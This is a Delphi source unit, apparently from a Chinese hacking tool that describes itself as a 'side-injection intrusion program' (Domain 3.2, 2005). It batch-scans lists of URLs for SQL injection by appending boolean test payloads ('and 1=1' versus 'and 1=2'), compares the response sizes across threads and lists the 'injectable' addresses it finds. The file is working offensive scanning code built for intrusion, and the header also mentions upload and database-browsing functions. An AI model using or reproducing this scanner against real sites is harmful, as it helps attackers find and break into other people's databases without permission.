scaninject.pas

domain3.2 SQL注入漏洞扫描 旁注 上传功能 数据库浏览

{##########################################
         旁注入侵专用程序 3.0升级版
 -----------------------------------------
  模块：网页扫描 - 批量扫描注入点
  描述：该单元为批量扫描注入点的线程单元
  作者：2005.3.17日下午  明小子
##########################################}

unit Scaninject;

interface

uses
  Classes, StdCtrls, Wininet, GetHttpSize, Windows, SysUtils, ComCtrls, Dialogs,
  RzlstBox, Shellapi;

type
  Thject = class(TThread)
  private
    Num: integer;
    ThreadCount: integer;
    ifor: integer;
    TempLsb: TRzListBox;
    ResultLstv: TListView;
    procedure UpdataMemo;
    procedure UpdataScan;
  protected
    procedure Execute; override;
  public
    constructor Create(ReadLsb: TRzListBox; SaveLisv: TListView; T_Num, ThCount: integer);
  end;

implementation

uses MainUnit;

constructor Thject.Create(ReadLsb: TRzListBox; SaveLisv: TListView; T_Num, ThCount: integer);
begin
  Num := T_Num; //传递的值
  ThreadCount := ThCount; //线程的数量
  TempLsb := ReadLsb; //从TMemo读出连接地址进行扫描
  ResultLstv := SaveLisv; //将结果保存到TListView
  FreeOnTerminate := True; //自动删除
  inherited create(False); //直接运行
end;

procedure Thject.UpdataMemo;
begin
  with ResultLstv.Items.Add do
  begin
    Caption := Trim(TempLsb.Items[ifor]);
    SubItems.Add('可注入 - ' + inttostr(ResultLstv.Items.Count));
  end;
  ResultLstv.Columns[0].Caption := '注入点: 共检测到' + inttostr(ResultLstv.Items.Count) + '个可注入地址!';
end;

procedure Thject.UpdataScan;
begin
  MainForm.ScanMemo.Lines.Add(TempLsb.Items[ifor]);
  MainForm.RzGroupBox17.Caption := '已检测连接:' + inttostr(MainForm.ScanMemo.Lines.Count) + '条';
  if MainForm.ScanMemo.Lines.Count >= MainForm.LinkLsb.Items.Count then {检测完毕后}
  begin
    MainForm.btnReadinject.Enabled := True;
    MainForm.sql_Suspend.Enabled := False;
    MainForm.sql_Stop.Enabled := False;
    MainForm.sql_Suspend.Caption := '暂停检测';

    MainForm.Gauge1.Progress := 0;
    MainForm.RzGroupBox6.Caption := '检测:';
    MainForm.Pane1.Caption := '检测完毕!';

    MainForm.Timer1.Enabled := False;
    FlashWindow(MainForm.Handle, True);
    MainForm.Timer1.Enabled := False;
    if MainForm.sqlListView.Items.Count = 0 then
      ShowMessage('所有连接地址已检测完毕,没有发现任何注入点!')
    else
      Showmessage('所有连接地址已检测完毕!'); 
    Exit;
  end;
end;

procedure Thject.Execute;
var
  and1, and2, i: integer;
  AVG, LinkCount: integer;
begin

  LinkCount := TempLsb.Items.Count; {连接地址的数量}

  { LinkCount = 连接地址的数量  ThreadCount = 线程的数量 }

  {用连接地址的数量除以线程的数量,得到他们的平均值}

  if (LinkCount mod ThreadCount) > 0 then
    AVG := LinkCount div ThreadCount + 1
  else
    AVG := LinkCount div ThreadCount;

  for i := ((Num * AVG) - AVG) to ((Num * AVG) - 1) do {线程分块检测}
  begin
    if Terminated then Exit;
    if i >= linkCount then Exit;
    try
      ifor := i;
      and1 := Get_HttpSize(TempLsb.Items[i] + '%20and%201=1', 40000);
      and2 := Get_HttpSize(TempLsb.Items[i] + '%20and%201=2', 40000);
      if Terminated then Exit;
      Synchronize(UpdataScan);
      if and1 > and2 then
      begin
        Synchronize(UpdataMemo);
      end;
    except
    end;

    sleep(50);
  end;

end;

end.